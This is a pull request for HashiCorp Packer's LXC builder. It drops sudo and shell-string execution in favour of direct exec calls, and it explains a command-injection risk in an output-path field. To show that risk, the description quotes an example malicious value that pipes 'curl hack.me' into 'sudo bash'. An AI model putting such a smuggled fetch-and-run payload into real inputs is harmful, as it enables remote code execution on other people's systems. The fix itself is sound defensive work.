### PR TITLE
[WIP] Unpriviliged LXC containers

### DIFF
--- a/builder/lxc/command.go
+++ b/builder/lxc/command.go
@@ -1,7 +1,11 @@
 package lxc
 
 import (
+	"bytes"
+	"fmt"
+	"log"
 	"os/exec"
+	"strings"
 )
 
 // CommandWrapper is a type that given a command, will possibly modify that
@@ -12,4 +16,26 @@ type CommandWrapper func(string) (string, error)
 // it within the context of a shell (/bin/sh).
 func ShellCommand(command string) *exec.Cmd {
 	return exec.Command("/bin/sh", "-c", command)
+}
+
+func RunCommand(args ...string) error {
+	var stdout, stderr bytes.Buffer
+
+	log.Printf("Executing args: %#v", args)
+	cmd := exec.Command(args[0], args[1:]...)
+	cmd.Stdout = &stdout
+	cmd.Stderr = &stderr
+	err := cmd.Run()
+
+	stdoutString := strings.TrimSpace(stdout.String())
+	stderrString := strings.TrimSpace(stderr.String())
+
+	if _, ok := err.(*exec.ExitError); ok {
+		err = fmt.Errorf("Command error: %s", stderrString)
+	}
+
+	log.Printf("stdout: %s", stdoutString)
+	log.Printf("stderr: %s", stderrString)
+
+	return err
 }

--- a/builder/lxc/step_lxc_create.go
+++ b/builder/lxc/step_lxc_create.go
@@ -1,13 +1,9 @@
 package lxc
 
 import (
-	"bytes"
 	"context"
 	"fmt"
-	"log"
-	"os/exec"
 	"path/filepath"
-	"strings"
 
 	"github.com/hashicorp/packer/helper/multistep"
 	"github.com/hashicorp/packer/packer"
@@ -30,7 +26,9 @@ func (s *stepLxcCreate) Run(_ context.Context, state multistep.StateBag) multist
 	}
 
 	commands := make([][]string, 3)
-	commands[0] = append(config.EnvVars, "lxc-create")
+	commands[0] = append(commands[0], "env")
+	commands[0] = append(commands[0], config.EnvVars...)
+	commands[0] = append(commands[0], "lxc-create")
 	commands[0] = append(commands[0], config.CreateOptions...)
 	commands[0] = append(commands[0], []string{"-n", name, "-t", config.Name, "--"}...)
 	commands[0] = append(commands[0], config.Parameters...)
@@ -42,8 +40,7 @@ func (s *stepLxcCreate) Run(_ context.Context, state multistep.StateBag) multist
 
 	ui.Say("Creating container...")
 	for _, command := range commands {
-		log.Printf("Executing sudo command: %#v", command)
-		err := s.SudoCommand(command...)
+		err := RunCommand(command...)
 		if err != nil {
 			err := fmt.Errorf("Error creating container: %s", err)
 			state.Put("error", err)
@@ -66,29 +63,7 @@ func (s *stepLxcCreate) Cleanup(state multistep.StateBag) {
 	}
 
 	ui.Say("Unregistering and deleting virtual machine...")
-	if err := s.SudoCommand(command...); err != nil {
+	if err := RunCommand(command...); err != nil {
 		ui.Error(fmt.Sprintf("Error deleting virtual machine: %s", err))
 	}
-}
-
-func (s *stepLxcCreate) SudoCommand(args ...string) error {
-	var stdout, stderr bytes.Buffer
-
-	log.Printf("Executing sudo command: %#v", args)
-	cmd := exec.Command("sudo", args...)
-	cmd.Stdout = &stdout
-	cmd.Stderr = &stderr
-	err := cmd.Run()
-
-	stdoutString := strings.TrimSpace(stdout.String())
-	stderrString := strings.TrimSpace(stderr.String())
-
-	if _, ok := err.(*exec.ExitError); ok {
-		err = fmt.Errorf("Sudo command error: %s", stderrString)
-	}
-
-	log.Printf("stdout: %s", stdoutString)
-	log.Printf("stderr: %s", stderrString)
-
-	return err
 }


### PR DESCRIPTION
@thedrow Can you give this branch a shot?
A quick test shows things working, but my LXC lab isn't too sophisticated.
I have an LXD container running this and things *appear* to work.

- Removes use of `sudo` inside the lxc builder, if needed one can `sudo packer build ...`
- DRYs up some duplicate code.
- Adds a dependency on `env` rather than starting a new `sh` and passing a string that has similar security woes.
- Overall we should have fewer levels of processes so things should be marginally faster (only noticeable if sudo hung on DNS or logging). (we no longer `sudo` -> `sh` -> `command`, we just `command` or `env` -> `command`)
- Closes a minor security thing if the packer json had malicious output paths
```
-	commands[3] = []string{
-		"sh", "-c", "chown $USER:`id -gn` " + filepath.Join(config.OutputDir, "*"),
-	}
```

`config.OutputDir` could be something mean like:
```
`curl hack.me | sudo bash`
```
and things would probably happen.
Admittedly, someone would have had to put that in their packer template, but still...

a variation of this exploit would be a user with access to run packer as sudo could `chown` arbitrary paths.
This means the permissions will have to be handled outside of packer, so packer may fail to write out the artifact if it doesn't have access to the destination.

Closes #6244

